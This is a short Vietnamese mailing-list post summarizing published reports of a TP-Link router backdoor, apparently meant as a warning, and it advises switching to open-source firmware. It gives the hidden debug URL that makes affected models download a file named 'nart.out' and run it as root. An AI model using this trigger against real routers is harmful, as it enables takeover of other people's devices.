[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

cài backdoor vào router TP-LinkXem bài gốc
   http://sekurak.pl/tp-link-httptftp-backdoor/
   http://sekurak.pl/more-information-about-tp-link-backdoor/

Con router trong bài đầu tiên là TL-WDR4300 TL-WR743ND (v1.2 v2.0). Nó
không có sẵn backdoor, nhưng có thễ dễ dàng cài thêm backdoor vào trong
router này:

* Click vào link
   http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html

* Router xử lý request này và tải về tập tin `nart.out`
* Router thi hành `nart.out` với quyền root :)

Lời khuyên là gì? Nếu dùng `TP-LINK` bạn nên đổi qua dùng các firmware
mã nguồn mở ;)

--
I am ... 5 dog years old.